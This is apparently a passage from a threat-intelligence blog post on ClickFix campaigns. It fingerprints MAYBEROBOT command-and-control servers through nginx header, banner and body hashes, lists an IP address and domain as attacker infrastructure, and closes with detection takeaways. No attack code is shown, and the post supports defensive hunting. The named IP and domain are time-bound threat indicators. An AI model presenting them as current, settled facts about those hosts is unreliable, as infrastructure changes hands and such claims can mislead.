MAYBEROBOT C2 endpoints consistently present an unusually minimalistic nginx/1.18.0 profile. Across multiple servers, the header block stays compatible enough to produce the same HEADER_HASH:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 08 Oct 2025 <redacted> GMT
Content-Type: text/html
Last-Modified: Thu, 02 Oct 2025 15:27:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"68de99e0-264"
Content-Encoding: gzip
HEADER_HASH: e4c05c73a19ce06e88dd
BANNER_0_HASH: ff50f710c0c2c1ec2a76c94c6b9b9b95
🧬 Secondary Variant — Same Header Hash, Different Content
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 08 Oct 2025 <redacted> GMT
Content-Type: text/html
Last-Modified: Tue, 21 Apr 2020 14:09:01 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"5e9efe7d-264"
Content-Encoding: gzip
HEADER_HASH: e4c05c73a19ce06e88dd
BANNER_0_HASH: c45b6393da4cd618b14d1fd50d0433a8
Key insight: even when HTML content and Last-Modified values differ, the HEADER_HASH (e4c05c73a19ce06e88dd) remains identical, making it a powerful pivot across MAYBEROBOT infrastructure.
📝 HTML Fingerprint
MAYBEROBOT servers often serve the stock Welcome to nginx! page with a stable body hash:
- ✦ HTML Title: Welcome to nginx!
- ✦ Body Hash (SHA1): 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
The trio nginx/1.18.0 + HEADER_HASH + stock nginx body strongly fingerprints MAYBEROBOT C2 nodes.
🌐 OSINT Pivots (Shodan, Urlscan, Domains)
MAYBEROBOT hosts surface across multiple OSINT platforms. These artefacts help expand the C2 graph:
- ✦ Shodan host: 185.28.119.41
- ✦ Urlscan capture: urlscan.io/result/0199e545…
- ✦ Urlscan domain search: southprovesolutions.com
Correlating these datapoints with HEADER_HASH e4c05c73a19ce06e88dd and nginx/1.18.0 produces tight infrastructure clusters that can be labelled as active COLDRIVER C2 nodes.
🧨 Closing Thoughts — From ClickFix Lures to C2 Maps
ClickFix turns a single Win+R command into a full kill chain. By enriching that view with C2 fingerprints from campaigns like BeaverTail and MAYBEROBOT, defenders can move from alert-by-alert response to infrastructure-level hunting: tracking reused headers, banner hashes, body hashes and port patterns across their estate. Once this playbook is wired into SIEM/EDR detections, every new lure becomes not just an incident, but an opportunity to burn another piece of the adversary’s infrastructure.
Conclusions
The 2025 wave of ClickFix-enabled operations reveals a unified pattern across COLDRIVER, Kimsuky, Sidewinder, and related ecosystems: a strategic shift toward user-driven execution and toolchain agility. No exploits. No macros. No staged documents. Instead, a single copy-paste command weaponizes the victim against themselves a frictionless entry point that bypasses traditional controls and compresses the attacker’s kill chain to seconds.
From COLDRIVER’s rapidly evolving NOROBOT–MAYBEROBOT pipeline to Kimsuky’s adoption of deepfake-augmented lure kits and Sidewinder’s PKCERT impersonation, the story is the same: identity trust + social pressure = initial access. Technical sophistication shows up primarily in the final payloads such as TropiDoor’s encrypted in-memory RAT or BeaverTail’s modular infostealer chain. The true innovation lies in collapsing human psychology into a reliable delivery vehicle.
⚡ Key Takeaways
Strategic Imperatives
- Identity trust is the new perimeter. Browser credential theft, session hijacking, and command-copy execution chains bypass classic detection.
- Human-layer detection must mature. Deepfake lures, CERT impersonation, and “urgent security patch” narratives amplify psychological exposure.
- Monitor the run dialog. ClickFix exploits Win + R as an execution substrate. Telemetry around RunMRU, clipboard activity, and encoded PowerShell blocks is essential.
- Treat developer ecosystems as high-risk terrain. Malicious NPM packages (BeaverTail), poisoned repositories, and cloned GitHub pages remain active vectors.
- Memory-resident payloads require behavioral defense. Tools like TropiDoor never write clear artifacts to disk forcing teams toward in-memory inspection.
- Iterate detection faster than attackers iterate tooling. COLDRIVER pushed three backdoor families in under 90 days. Blue teams must match this pace through continuous rule tuning and post-incident detection expansion.
Need help validating detections?